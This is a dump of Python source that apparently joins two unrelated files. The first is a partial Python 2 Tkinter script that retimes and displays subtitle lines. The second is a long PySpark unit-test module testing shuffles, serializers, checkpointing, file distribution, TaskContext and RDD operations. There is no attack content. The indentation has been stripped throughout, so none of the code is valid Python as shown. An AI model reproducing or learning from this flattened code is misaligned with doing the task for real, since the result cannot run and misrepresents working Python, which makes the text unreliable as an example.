start = get_ms(sub.start)
char = len(sub.text)
time_need = int((char / 3.0) / (200.0/60.0) * 1000.0)
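    # e.g. a 60-character line: 60/3 = 20 "words"; at 200 wpm that is 20/(200/60.0) = 6 s -> time_need = 6000 ms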
if (sub.end - sub.start) > int(time_need):
pass
else:
time_need = int((char / 3.0) / (250.0/60.0) * 1000.0)
subs[set1].end = (subs[set1].start + time_need + 100)
subs[set1].text = subs[set1].text + ' zz$'
try:
if subs[set1].end >= subs[(set1 +1)].start:
subs[(set1 +1)].start = (subs[set1].end)
else:
pass
except IndexError:
pass
set1 +=1
compsrt.append(str(set1) + '\n' + str(sub.start) + " - " + str(sub.end) + '\n' + str(sub.text) + '\n\n')
ed = open('compsrt.txt', 'w')
for i in compsrt:
ed.write(i)
ed.close()
# print sub.end,sub.start
# print (sub.end - sub.start)
# print int(time_need)
# print sub.text
# if (sub.end - sub.start) < int(time_need):
# pass
# set2 += 1
# else:
# pass
root = Tk()
root.wm_minsize(root.winfo_screenwidth() - 25, 200)
var = StringVar()
def nextline(event):
global inter
inter = 'asdf'
global set2
set2 = set2 + 1
print set2
print subs[set2].text
lblsub.config(text=(subs[set2].text))
def pause(event):
global settozero
settozero = 5
global interupt
if interupt == 5:
interupt = 0
else:
interupt = 5
def backline(event):
global inter
inter = 'asdf'
global set2
set2 = set2 - 1
print subs[set2].text
lblsub.config(text=(subs[set2].text))
def enterline(line):
global inter
inter = 'asdf'
global set2
set2 = int(line)-1
print line
root.attributes("-topmost", True)
lblsub = Label(root,text='',font='comic 45',height=2,bg='gray')
lblsub.pack(fill=X)
lblcount = Label(root,textvariable=var)
lblcount.pack(fill=X)
ent = Entry(root)
ent.pack(fill=X)
ent.bind('<Return>', lambda e: enterline(ent.get()))
lbl = Label(root,text="start")
lbl.pack(fill=X)
lbl.bind("<Button-1>",start_speak1)
root.bind('<Right>', nextline)
root.bind('<Down>', pause)
root.bind('<Left>', backline)
root.mainloop()
|
tests.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Unit tests for PySpark; additional tests are implemented as doctests in
individual modules.
"""
from array import array
from glob import glob
import os
import re
import shutil
import subprocess
import sys
import tempfile
import time
import zipfile
import random
import threading
import hashlib
from py4j.protocol import Py4JJavaError
try:
import xmlrunner
except ImportError:
xmlrunner = None
if sys.version_info[:2] <= (2, 6):
try:
import unittest2 as unittest
except ImportError:
sys.stderr.write('Please install unittest2 to test with Python 2.6 or earlier')
sys.exit(1)
else:
import unittest
if sys.version_info[0] >= 3:
xrange = range
basestring = str
if sys.version >= "3":
from io import StringIO
else:
from StringIO import StringIO
from pyspark import keyword_only
from pyspark.conf import SparkConf
from pyspark.context import SparkContext
from pyspark.rdd import RDD
from pyspark.files import SparkFiles
from pyspark.serializers import read_int, BatchedSerializer, MarshalSerializer, PickleSerializer, \
CloudPickleSerializer, CompressedSerializer, UTF8Deserializer, NoOpSerializer, \
PairDeserializer, CartesianDeserializer, AutoBatchedSerializer, AutoSerializer, \
FlattenedValuesSerializer
from pyspark.shuffle import Aggregator, ExternalMerger, ExternalSorter
from pyspark import shuffle
from pyspark.profiler import BasicProfiler
from pyspark.taskcontext import TaskContext
_have_scipy = False
_have_numpy = False
try:
import scipy.sparse
_have_scipy = True
except:
# No SciPy, but that's okay, we'll skip those tests
pass
try:
import numpy as np
_have_numpy = True
except:
# No NumPy, but that's okay, we'll skip those tests
pass
SPARK_HOME = os.environ["SPARK_HOME"]
class MergerTests(unittest.TestCase):
def setUp(self):
self.N = 1 << 12
self.l = [i for i in xrange(self.N)]
self.data = list(zip(self.l, self.l))
self.agg = Aggregator(lambda x: [x],
lambda x, y: x.append(y) or x,
lambda x, y: x.extend(y) or x)
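        # Aggregator(createCombiner, mergeValue, mergeCombiners): collects every value for a key into a list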
def test_small_dataset(self):
m = ExternalMerger(self.agg, 1000)
m.mergeValues(self.data)
self.assertEqual(m.spills, 0)
self.assertEqual(sum(sum(v) for k, v in m.items()),
sum(xrange(self.N)))
m = ExternalMerger(self.agg, 1000)
m.mergeCombiners(map(lambda x_y1: (x_y1[0], [x_y1[1]]), self.data))
self.assertEqual(m.spills, 0)
self.assertEqual(sum(sum(v) for k, v in m.items()),
sum(xrange(self.N)))
def test_medium_dataset(self):
m = ExternalMerger(self.agg, 20)
m.mergeValues(self.data)
self.assertTrue(m.spills >= 1)
self.assertEqual(sum(sum(v) for k, v in m.items()),
sum(xrange(self.N)))
m = ExternalMerger(self.agg, 10)
m.mergeCombiners(map(lambda x_y2: (x_y2[0], [x_y2[1]]), self.data * 3))
self.assertTrue(m.spills >= 1)
self.assertEqual(sum(sum(v) for k, v in m.items()),
sum(xrange(self.N)) * 3)
def test_huge_dataset(self):
m = ExternalMerger(self.agg, 5, partitions=3)
m.mergeCombiners(map(lambda k_v: (k_v[0], [str(k_v[1])]), self.data * 10))
self.assertTrue(m.spills >= 1)
self.assertEqual(sum(len(v) for k, v in m.items()),
self.N * 10)
m._cleanup()
def test_group_by_key(self):
def gen_data(N, step):
for i in range(1, N + 1, step):
for j in range(i):
yield (i, [j])
def gen_gs(N, step=1):
return shuffle.GroupByKey(gen_data(N, step))
self.assertEqual(1, len(list(gen_gs(1))))
self.assertEqual(2, len(list(gen_gs(2))))
self.assertEqual(100, len(list(gen_gs(100))))
self.assertEqual(list(range(1, 101)), [k for k, _ in gen_gs(100)])
self.assertTrue(all(list(range(k)) == list(vs) for k, vs in gen_gs(100)))
for k, vs in gen_gs(50002, 10000):
self.assertEqual(k, len(vs))
self.assertEqual(list(range(k)), list(vs))
ser = PickleSerializer()
l = ser.loads(ser.dumps(list(gen_gs(50002, 30000))))
for k, vs in l:
self.assertEqual(k, len(vs))
self.assertEqual(list(range(k)), list(vs))
class SorterTests(unittest.TestCase):
def test_in_memory_sort(self):
l = list(range(1024))
random.shuffle(l)
sorter = ExternalSorter(1024)
self.assertEqual(sorted(l), list(sorter.sorted(l)))
self.assertEqual(sorted(l, reverse=True), list(sorter.sorted(l, reverse=True)))
self.assertEqual(sorted(l, key=lambda x: -x), list(sorter.sorted(l, key=lambda x: -x)))
self.assertEqual(sorted(l, key=lambda x: -x, reverse=True),
list(sorter.sorted(l, key=lambda x: -x, reverse=True)))
def test_external_sort(self):
class CustomizedSorter(ExternalSorter):
def _next_limit(self):
return self.memory_limit
l = list(range(1024))
random.shuffle(l)
sorter = CustomizedSorter(1)
self.assertEqual(sorted(l), list(sorter.sorted(l)))
self.assertGreater(shuffle.DiskBytesSpilled, 0)
last = shuffle.DiskBytesSpilled
self.assertEqual(sorted(l, reverse=True), list(sorter.sorted(l, reverse=True)))
self.assertGreater(shuffle.DiskBytesSpilled, last)
last = shuffle.DiskBytesSpilled
self.assertEqual(sorted(l, key=lambda x: -x), list(sorter.sorted(l, key=lambda x: -x)))
self.assertGreater(shuffle.DiskBytesSpilled, last)
last = shuffle.DiskBytesSpilled
self.assertEqual(sorted(l, key=lambda x: -x, reverse=True),
list(sorter.sorted(l, key=lambda x: -x, reverse=True)))
self.assertGreater(shuffle.DiskBytesSpilled, last)
def test_external_sort_in_rdd(self):
conf = SparkConf().set("spark.python.worker.memory", "1m")
sc = SparkContext(conf=conf)
l = list(range(10240))
random.shuffle(l)
rdd = sc.parallelize(l, 4)
self.assertEqual(sorted(l), rdd.sortBy(lambda x: x).collect())
sc.stop()
class SerializationTestCase(unittest.TestCase):
def test_namedtuple(self):
from collections import namedtuple
from pickle import dumps, loads
P = namedtuple("P", "x y")
p1 = P(1, 3)
p2 = loads(dumps(p1, 2))
self.assertEqual(p1, p2)
from pyspark.cloudpickle import dumps
P2 = loads(dumps(P))
p3 = P2(1, 3)
self.assertEqual(p1, p3)
def test_itemgetter(self):
from operator import itemgetter
ser = CloudPickleSerializer()
d = range(10)
getter = itemgetter(1)
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
getter = itemgetter(0, 3)
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
def test_function_module_name(self):
ser = CloudPickleSerializer()
func = lambda x: x
func2 = ser.loads(ser.dumps(func))
self.assertEqual(func.__module__, func2.__module__)
def test_attrgetter(self):
from operator import attrgetter
ser = CloudPickleSerializer()
class C(object):
def __getattr__(self, item):
return item
d = C()
getter = attrgetter("a")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
getter = attrgetter("a", "b")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
d.e = C()
getter = attrgetter("e.a")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
getter = attrgetter("e.a", "e.b")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
# Regression test for SPARK-3415
def test_pickling_file_handles(self):
# to be corrected with SPARK-11160
if not xmlrunner:
ser = CloudPickleSerializer()
out1 = sys.stderr
out2 = ser.loads(ser.dumps(out1))
self.assertEqual(out1, out2)
def test_func_globals(self):
class Unpicklable(object):
def __reduce__(self):
raise Exception("not picklable")
global exit
exit = Unpicklable()
ser = CloudPickleSerializer()
self.assertRaises(Exception, lambda: ser.dumps(exit))
def foo():
sys.exit(0)
self.assertTrue("exit" in foo.__code__.co_names)
ser.dumps(foo)
def test_compressed_serializer(self):
ser = CompressedSerializer(PickleSerializer())
try:
from StringIO import StringIO
except ImportError:
from io import BytesIO as StringIO
io = StringIO()
ser.dump_stream(["abc", u"123", range(5)], io)
io.seek(0)
self.assertEqual(["abc", u"123", range(5)], list(ser.load_stream(io)))
ser.dump_stream(range(1000), io)
io.seek(0)
self.assertEqual(["abc", u"123", range(5)] + list(range(1000)), list(ser.load_stream(io)))
io.close()
def test_hash_serializer(self):
hash(NoOpSerializer())
hash(UTF8Deserializer())
hash(PickleSerializer())
hash(MarshalSerializer())
hash(AutoSerializer())
hash(BatchedSerializer(PickleSerializer()))
hash(AutoBatchedSerializer(MarshalSerializer()))
hash(PairDeserializer(NoOpSerializer(), UTF8Deserializer()))
hash(CartesianDeserializer(NoOpSerializer(), UTF8Deserializer()))
hash(CompressedSerializer(PickleSerializer()))
hash(FlattenedValuesSerializer(PickleSerializer()))
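# Temporarily raises the root log4j logger to FATAL so that tests which intentionally
# trigger Spark job failures do not flood the test output with stack traces.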
class QuietTest(object):
def __init__(self, sc):
self.log4j = sc._jvm.org.apache.log4j
def __enter__(self):
self.old_level = self.log4j.LogManager.getRootLogger().getLevel()
self.log4j.LogManager.getRootLogger().setLevel(self.log4j.Level.FATAL)
def __exit__(self, exc_type, exc_val, exc_tb):
self.log4j.LogManager.getRootLogger().setLevel(self.old_level)
class PySparkTestCase(unittest.TestCase):
def setUp(self):
self._old_sys_path = list(sys.path)
class_name = self.__class__.__name__
self.sc = SparkContext('local[4]', class_name)
def tearDown(self):
self.sc.stop()
sys.path = self._old_sys_path
class ReusedPySparkTestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.sc = SparkContext('local[4]', cls.__name__)
@classmethod
def tearDownClass(cls):
cls.sc.stop()
class CheckpointTests(ReusedPySparkTestCase):
def setUp(self):
self.checkpointDir = tempfile.NamedTemporaryFile(delete=False)
os.unlink(self.checkpointDir.name)
self.sc.setCheckpointDir(self.checkpointDir.name)
def tearDown(self):
shutil.rmtree(self.checkpointDir.name)
def test_basic_checkpointing(self):
parCollection = self.sc.parallelize([1, 2, 3, 4])
flatMappedRDD = parCollection.flatMap(lambda x: range(1, x + 1))
self.assertFalse(flatMappedRDD.isCheckpointed())
self.assertTrue(flatMappedRDD.getCheckpointFile() is None)
flatMappedRDD.checkpoint()
result = flatMappedRDD.collect()
time.sleep(1) # 1 second
self.assertTrue(flatMappedRDD.isCheckpointed())
self.assertEqual(flatMappedRDD.collect(), result)
self.assertEqual("file:" + self.checkpointDir.name,
os.path.dirname(os.path.dirname(flatMappedRDD.getCheckpointFile())))
def test_checkpoint_and_restore(self):
parCollection = self.sc.parallelize([1, 2, 3, 4])
flatMappedRDD = parCollection.flatMap(lambda x: [x])
self.assertFalse(flatMappedRDD.isCheckpointed())
self.assertTrue(flatMappedRDD.getCheckpointFile() is None)
flatMappedRDD.checkpoint()
flatMappedRDD.count() # forces a checkpoint to be computed
time.sleep(1) # 1 second
self.assertTrue(flatMappedRDD.getCheckpointFile() is not None)
recovered = self.sc._checkpointFile(flatMappedRDD.getCheckpointFile(),
flatMappedRDD._jrdd_deserializer)
self.assertEqual([1, 2, 3, 4], recovered.collect())
class LocalCheckpointTests(ReusedPySparkTestCase):
def test_basic_localcheckpointing(self):
parCollection = self.sc.parallelize([1, 2, 3, 4])
flatMappedRDD = parCollection.flatMap(lambda x: range(1, x + 1))
self.assertFalse(flatMappedRDD.isCheckpointed())
self.assertFalse(flatMappedRDD.isLocallyCheckpointed())
flatMappedRDD.localCheckpoint()
result = flatMappedRDD.collect()
time.sleep(1) # 1 second
self.assertTrue(flatMappedRDD.isCheckpointed())
self.assertTrue(flatMappedRDD.isLocallyCheckpointed())
self.assertEqual(flatMappedRDD.collect(), result)
class AddFileTests(PySparkTestCase):
def test_add_py_file(self):
# To ensure that we're actually testing addPyFile's effects, check that
# this job fails due to `userlibrary` not being on the Python path:
# disable logging in log4j temporarily
def func(x):
from userlibrary import UserClass
return UserClass().hello()
with QuietTest(self.sc):
self.assertRaises(Exception, self.sc.parallelize(range(2)).map(func).first)
# Add the file, so the job should now succeed:
path = os.path.join(SPARK_HOME, "python/test_support/userlibrary.py")
self.sc.addPyFile(path)
res = self.sc.parallelize(range(2)).map(func).first()
self.assertEqual("Hello World!", res)
def test_add_file_locally(self):
path = os.path.join(SPARK_HOME, "python/test_support/hello/hello.txt")
self.sc.addFile(path)
download_path = SparkFiles.get("hello.txt")
self.assertNotEqual(path, download_path)
with open(download_path) as test_file:
self.assertEqual("Hello World!\n", test_file.readline())
def test_add_file_recursively_locally(self):
path = os.path.join(SPARK_HOME, "python/test_support/hello")
self.sc.addFile(path, True)
download_path = SparkFiles.get("hello")
self.assertNotEqual(path, download_path)
with open(download_path + "/hello.txt") as test_file:
self.assertEqual("Hello World!\n", test_file.readline())
with open(download_path + "/sub_hello/sub_hello.txt") as test_file:
self.assertEqual("Sub Hello World!\n", test_file.readline())
def test_add_py_file_locally(self):
# To ensure that we're actually testing addPyFile's effects, check that
# this fails due to `userlibrary` not being on the Python path:
def func():
from userlibrary import UserClass
self.assertRaises(ImportError, func)
path = os.path.join(SPARK_HOME, "python/test_support/userlibrary.py")
self.sc.addPyFile(path)
from userlibrary import UserClass
self.assertEqual("Hello World!", UserClass().hello())
def test_add_egg_file_locally(self):
# To ensure that we're actually testing addPyFile's effects, check that
# this fails due to `userlibrary` not being on the Python path:
def func():
from userlib import UserClass
self.assertRaises(ImportError, func)
path = os.path.join(SPARK_HOME, "python/test_support/userlib-0.1.zip")
self.sc.addPyFile(path)
from userlib import UserClass
self.assertEqual("Hello World from inside a package!", UserClass().hello())
def test_overwrite_system_module(self):
self.sc.addPyFile(os.path.join(SPARK_HOME, "python/test_support/SimpleHTTPServer.py"))
import SimpleHTTPServer
self.assertEqual("My Server", SimpleHTTPServer.__name__)
def func(x):
import SimpleHTTPServer
return SimpleHTTPServer.__name__
self.assertEqual(["My Server"], self.sc.parallelize(range(1)).map(func).collect())
class TaskContextTests(PySparkTestCase):
def setUp(self):
self._old_sys_path = list(sys.path)
class_name = self.__class__.__name__
# Allow retries even though they are normally disabled in local mode
self.sc = SparkContext('local[4, 2]', class_name)
def test_stage_id(self):
"""Test the stage ids are available and incrementing as expected."""
rdd = self.sc.parallelize(range(10))
stage1 = rdd.map(lambda x: TaskContext.get().stageId()).take(1)[0]
stage2 = rdd.map(lambda x: TaskContext.get().stageId()).take(1)[0]
# Test using the constructor directly rather than the get()
stage3 = rdd.map(lambda x: TaskContext().stageId()).take(1)[0]
self.assertEqual(stage1 + 1, stage2)
self.assertEqual(stage1 + 2, stage3)
self.assertEqual(stage2 + 1, stage3)
def test_partition_id(self):
"""Test the partition id."""
rdd1 = self.sc.parallelize(range(10), 1)
rdd2 = self.sc.parallelize(range(10), 2)
pids1 = rdd1.map(lambda x: TaskContext.get().partitionId()).collect()
pids2 = rdd2.map(lambda x: TaskContext.get().partitionId()).collect()
self.assertEqual(0, pids1[0])
self.assertEqual(0, pids1[9])
self.assertEqual(0, pids2[0])
self.assertEqual(1, pids2[9])
def test_attempt_number(self):
"""Verify the attempt numbers are correctly reported."""
rdd = self.sc.parallelize(range(10))
# Verify a simple job with no failures
attempt_numbers = rdd.map(lambda x: TaskContext.get().attemptNumber()).collect()
map(lambda attempt: self.assertEqual(0, attempt), attempt_numbers)
def fail_on_first(x):
"""Fail on the first attempt so we get a positive attempt number"""
tc = TaskContext.get()
attempt_number = tc.attemptNumber()
partition_id = tc.partitionId()
attempt_id = tc.taskAttemptId()
if attempt_number == 0 and partition_id == 0:
raise Exception("Failing on first attempt")
else:
return [x, partition_id, attempt_number, attempt_id]
result = rdd.map(fail_on_first).collect()
        # The first partition should be re-submitted, while the other partitions should be attempt 0
self.assertEqual([0, 0, 1], result[0][0:3])
self.assertEqual([9, 3, 0], result[9][0:3])
first_partition = filter(lambda x: x[1] == 0, result)
map(lambda x: self.assertEqual(1, x[2]), first_partition)
other_partitions = filter(lambda x: x[1] != 0, result)
map(lambda x: self.assertEqual(0, x[2]), other_partitions)
# The task attempt id should be different
self.assertTrue(result[0][3] != result[9][3])
def test_tc_on_driver(self):
"""Verify that getting the TaskContext on the driver returns None."""
tc = TaskContext.get()
self.assertTrue(tc is None)
class RDDTests(ReusedPySparkTestCase):
def test_range(self):
self.assertEqual(self.sc.range(1, 1).count(), 0)
self.assertEqual(self.sc.range(1, 0, -1).count(), 1)
self.assertEqual(self.sc.range(0, 1 << 40, 1 << 39).count(), 2)
def test_id(self):
rdd = self.sc.parallelize(range(10))
id = rdd.id()
self.assertEqual(id, rdd.id())
rdd2 = rdd.map(str).filter(bool)
id2 = rdd2.id()
self.assertEqual(id + 1, id2)
self.assertEqual(id2, rdd2.id())
def test_empty_rdd(self):
rdd = self.sc.emptyRDD()
self.assertTrue(rdd.isEmpty())
def test_sum(self):
self.assertEqual(0, self.sc.emptyRDD().sum())
self.assertEqual(6, self.sc.parallelize([1, 2, 3]).sum())
def test_to_localiterator(self):
from time import sleep
rdd = self.sc.parallelize([1, 2, 3])
it = rdd.toLocalIterator()
sleep(5)
self.assertEqual([1, 2, 3], sorted(it))
rdd2 = rdd.repartition(1000)
it2 = rdd2.toLocalIterator()
sleep(5)
self.assertEqual([1, 2, 3], sorted(it2))
def test_save_as_textfile_with_unicode(self):
# Regression test for SPARK-970
x = u"\u00A1Hola, mundo!"
data = self.sc.parallelize([x])
tempFile = tempfile.NamedTemporaryFile(delete=True)
tempFile.close()
data.saveAsTextFile(tempFile.name)
raw_contents = b''.join(open(p, 'rb').read()
for p in glob(tempFile.name + "/part-0000*"))
self.assertEqual(x, raw_contents.strip().decode("utf-8"))
def test_save_as_textfile_with_utf8(self):
x = u"\u00A1Hola, mundo!"
data = self.sc.parallelize([x.encode("utf-8")])
tempFile = tempfile.NamedTemporaryFile(delete=True)
tempFile.close()
data.saveAsTextFile(tempFile.name)
raw_contents = b''.join(open(p, 'rb').read()
for p in glob(tempFile.name + "/part-0000*"))
self.assertEqual(x, raw_contents.strip().decode('utf8'))
def test_transforming_cartesian_result(self):
# Regression test for SPARK-1034
rdd1 = self.sc.parallelize([1, 2])
rdd2 = self.sc.parallelize([3, 4])
cart = rdd1.cartesian(rdd2)
result = cart.map(lambda x_y3: x_y3[0] + x_y3[1]).collect()
def test_transforming_pickle_file(self):
# Regression test for SPARK-2601
data = self.sc.parallelize([u"Hello", u"World!"])
tempFile = tempfile.NamedTemporaryFile(delete=True)
tempFile.close()
data.saveAsPickleFile(tempFile.name)
pickled_file = self.sc.pickleFile(tempFile.name)
pickled_file.map(lambda x: x).collect()
def test_cartesian_on_textfile(self):
# Regression test for
path = os.path.join(SPARK_HOME, "python/test_support/hello/hello.txt")
a = self.sc.textFile(path)
result = a.cartesian(a).collect()
(x, y) = result[0]
self.assertEqual(u"Hello World!", x.strip())
self.assertEqual(u"Hello World!", y.strip())
def test_cartesian_chaining(self):
# Tests for SPARK-16589
rdd = self.sc.parallelize(range(10), 2)
self.assertSetEqual(
set(rdd.cartesian(rdd).cartesian(rdd).collect()),
set([((x, y), z) for x in range(10) for y in range(10) for z in range(10)])
)
self.assertSetEqual(
set(rdd.cartesian(rdd.cartesian(rdd)).collect()),
set([(x, (y, z)) for x in range(10) for y in range(10) for z in range(10)])
)
self.assertSetEqual(
set(rdd.cartesian(rdd.zip(rdd)).collect()),
set([(x, (y, y)) for x in range(10) for y in range(10)])
)
def test_zip_chaining(self):
# Tests for SPARK-21985
rdd = self.sc.parallelize('abc', 2)
self.assertSetEqual(
set(rdd.zip(rdd).zip(rdd).collect()),
set([((x, x), x) for x in 'abc'])
)
self.assertSetEqual(
set(rdd.zip(rdd.zip(rdd)).collect()),
set([(x, (x, x)) for x in 'abc'])
)
def test_deleting_input_files(self):
# Regression test for SPARK-1025
tempFile = tempfile.NamedTemporaryFile(delete=False)
tempFile.write(b"Hello World!")
tempFile.close()
data = self.sc.textFile(tempFile.name)
filtered_data = data.filter(lambda x: True)
self.assertEqual(1, filtered_data.count())
os.unlink(tempFile.name)
with QuietTest(self.sc):
self.assertRaises(Exception, lambda: filtered_data.count())
def test_sampling_default_seed(self):
# Test for SPARK-3995 (default seed setting)
data = self.sc.parallelize(xrange(1000), 1)
subset = data.takeSample(False, 10)
self.assertEqual(len(subset), 10)
def test_aggregate_mutable_zero_value(self):
# Test for SPARK-9021; uses aggregate and treeAggregate to build dict
# representing a counter of ints
# NOTE: dict is used instead of collections.Counter for Python 2.6
# compatibility
from collections import defaultdict
# Show that single or multiple partitions work
data1 = self.sc.range(10, numSlices=1)
data2 = self.sc.range(10, numSlices=2)
def seqOp(x, y):
x[y] += 1
return x
def comboOp(x, y):
for key, val in y.items():
x[key] += val
return x
counts1 = data1.aggregate(defaultdict(int), seqOp, comboOp)
counts2 = data2.aggregate(defaultdict(int), seqOp, comboOp)
counts3 = data1.treeAggregate(defaultdict(int), seqOp, comboOp, 2)
counts4 = data2.treeAggregate(defaultdict(int), seqOp, comboOp, 2)
ground_truth = defaultdict(int, dict((i, 1) for i in range(10)))
self.assertEqual(counts1, ground_truth)
self.assertEqual(counts2, ground_truth)
self.assertEqual(counts3, ground_truth)
self.assertEqual(counts4, ground_truth)
def test_aggregate_by_key_mutable_zero_value(self):
# Test for SPARK-9021; uses aggregateByKey to make a pair RDD that
# contains lists of all values for each key in the original RDD
# list(range(...)) for Python 3.x compatibility (can't use * operator
# on a range object)
# list(zip(...)) for Python 3.x compatibility (want to parallelize a
# collection, not a zip object)
tuples = list(zip(list(range(10))*2, [1]*20))
# Show that single or multiple partitions work
data1 = self.sc.parallelize(tuples, 1)
data2 = self.sc.parallelize(tuples, 2)
def seqOp(x, y):
x.append(y)
return x
def comboOp(x, y):
x.extend(y)
return x
values1 = data1.aggregateByKey([], seqOp, comboOp).collect()
values2 = data2.aggregateByKey([], seqOp, comboOp).collect()
# Sort lists to ensure clean comparison with ground_truth
values1.sort()
values2.sort()
ground_truth = [(i, [1]*2) for i in range(10)]
self.assertEqual(values1, ground_truth)
self.assertEqual(values2, ground_truth)
def test_fold_mutable_zero_value(self):
# Test for SPARK-9021; uses fold to merge an RDD of dict counters into
# a single dict
# NOTE: dict is used instead of collections.Counter for Python 2.6
# compatibility
from collections import defaultdict
counts1 = defaultdict(int, dict((i, 1) for i in range(10)))
counts2 = defaultdict(int, dict((i, 1) for i in range(3, 8)))
counts3 = defaultdict(int, dict((i, 1) for i in range(4, 7)))
counts4 = defaultdict(int, dict((i, 1) for i in range(5, 6)))
all_counts = [counts1, counts2, counts3, counts4]
# Show that single or multiple partitions work
data1 = self.sc.parallelize(all_counts, 1)
data2 = self.sc.parallelize(all_counts, 2)
def comboOp(x, y):
for key, val in y.items():
x[key] += val
return x
fold1 = data1.fold(defaultdict(int), comboOp)
fold2 = data2.fold(defaultdict(int), comboOp)
ground_truth = defaultdict(int)
for counts in all_counts:
for key, val in counts.items():
ground_truth[key] += val
self.assertEqual(fold1, ground_truth)
self.assertEqual(fold2, ground_truth)
def test_fold_by_key_mutable_zero_value(self):
# Test for SPARK-9021; uses foldByKey to make a pair RDD that contains
# lists of all values for each key in the original RDD
tuples = [(i, range(i)) for i in range(10)]*2
# Show that single or multiple partitions work
data1 = self.sc.parallelize(tuples, 1)
data2 = self.sc.parallelize(tuples, 2)
def comboOp(x, y):
x.extend(y)
return x
values1 = data1.foldByKey([], comboOp).collect()
values2 = data2.foldByKey([], comboOp).collect()
# Sort lists to ensure clean comparison with ground_truth
values1.sort()
values2.sort()
# list(range(...)) for Python 3.x compatibility
ground_truth = [(i, list(range(i))*2) for i in range(10)]
self.assertEqual(values1, ground_truth)
self.assertEqual(values2, ground_truth)
def test_aggregate_by_key(self):
data = self.sc.parallelize([(1, 1), (1, 1), (3, 2), (5, 1), (5, 3)], 2)
def seqOp(x, y):
x.add(y)
return x
def combOp(x, y):
x |= y
return x
sets = dict(data.aggregateByKey(set(), seqOp, combOp).collect())
self.assertEqual(3, len(sets))
self.assertEqual(set([1]), sets[1])
self.assertEqual(set([2]), sets[3])
self.assertEqual(set([1, 3]), sets[5])
def test_itemgetter(self):
rdd = self.sc.parallelize([range(10)])
from operator import itemgetter
self.assertEqual([1], rdd.map(itemgetter(1)).collect())
self.assertEqual([(2, 3)], rdd.map(itemgetter(2, 3)).collect())
def test_namedtuple_in_rdd(self):
from collections import namedtuple
Person = namedtuple("Person", "id firstName lastName")
jon = Person(1, "Jon", "Doe")
jane = Person(2, "Jane", "Doe")
theDoes = self.sc.parallelize([jon, jane])
self.assertEqual([jon, jane], theDoes.collect())
def test_large_broadcast(self):
N = 10000
data = [[float(i) for i in range(300)] for i in range(N)]
bdata = self.sc.broadcast(data) # 27MB
m = self.sc.parallelize(range(1), 1).map(lambda x: len(bdata.value)).sum()
self.assertEqual(N, m)
def test_unpersist(self):
N = 1000
data = [[float(i) for i in range(300)] for i in range(N)]
bdata = self.sc.broadcast(data) # 3MB
bdata.unpersist()
m = self.sc.parallelize(range(1), 1).map(lambda x: len(bdata.value)).sum()
self.assertEqual(N, m)
bdata.destroy()
try:
self.sc.parallelize(range(1), 1).map(lambda x: len(bdata.value)).sum()
except Exception as e:
pass
else:
raise Exception("job should fail after destroy the broadcast")
def test_multiple_broadcasts(self):
N = 1 << 21
b1 = self.sc.broadcast(set(range(N))) # multiple blocks in JVM
r = list(range(1 << 15))
random.shuffle(r)
s = str(r).encode()
checksum = hashlib.md5(s).hexdigest()
b2 = self.sc.broadcast(s)
r = list(set(self.sc.parallelize(range(10), 10).map(
lambda x: (len(b1.value), hashlib.md5(b2.value).hexdigest())).collect()))
self.assertEqual(1, len(r))
size, csum = r[0]
self.assertEqual(N, size)
self.assertEqual(checksum, csum)
random.shuffle(r)
s = str(r).encode()
checksum = hashlib.md5(s).hexdigest()
b2 = self.sc.broadcast(s)
r = list(set(self.sc.parallelize(range(10), 10).map(
lambda x: (len(b1.value), hashlib.md5(b2.value).hexdigest())).collect()))
self.assertEqual(1, len(r))
size, csum = r[0]
self.assertEqual(N, size)
self.assertEqual(checksum, csum)
def test_multithread_broadcast_pickle(self):
import threading
b1 = self.sc.broadcast(list(range(3)))
b2 = self.sc.broadcast(list(range(3)))
def f1():
return b1.value
def f2():
return b2.value
funcs_num_pickled = {f1: None, f2: None}
def do_pickle(f, sc):
command = (f, None, sc.serializer, sc.serializer)
ser = CloudPickleSerializer()
ser.dumps(command)
def process_vars(sc):
broadcast_vars = list(sc._pickled_broadcast_vars)
num_pickled = len(broadcast_vars)
sc._pickled_broadcast_vars.clear()
return num_pickled
def run(f, sc):
do_pickle(f, sc)
funcs_num_pickled[f] = process_vars(sc)
# pickle f1, adds b1 to sc._pickled_broadcast_vars in main thread local storage
do_pickle(f1, self.sc)
# run all for f2, should only add/count/clear b2 from worker thread local storage
t = threading.Thread(target=run, args=(f2, self.sc))
t.start()
t.join()
# count number of vars pickled in main thread, only b1 should be counted and cleared
funcs_num_pickled[f1] = process_vars(self.sc)
self.assertEqual(funcs_num_pickled[f1], 1)
self.assertEqual(funcs_num_pickled[f2], 1)
self.assertEqual(len(list(self.sc._pickled_broadcast_vars)), 0)
def test_large_closure(self):
N = 200000
data = [float(i) for i in xrange(N)]
rdd = self.sc.parallelize(range(1), 1).map(lambda x: len(data))
self.assertEqual(N, rdd.first())
# regression test for SPARK-6886
self.assertEqual(1, rdd.map(lambda x: (x, 1)).groupByKey().count())
def test_zip_with_different_serializers(self):
a = self.sc.parallelize(range(5))
b = self.sc.parallelize(range(100, 105))
self.assertEqual(a.zip(b).collect(), [(0, 100), (1, 101), (2, 102), (3, 103), (4, 104)])
a = a._reserialize(BatchedSerializer(PickleSerializer(), 2))
b = b._reserialize(MarshalSerializer())
self.assertEqual(a.zip(b).collect(), [(0, 100), (1, 101), (2, 102), (3, 103), (4, 104)])
# regression test for SPARK-4841
path = os.path.join(SPARK_HOME, "python/test_support/hello/hello.txt")
t = self.sc.textFile(path)
cnt = t.count()
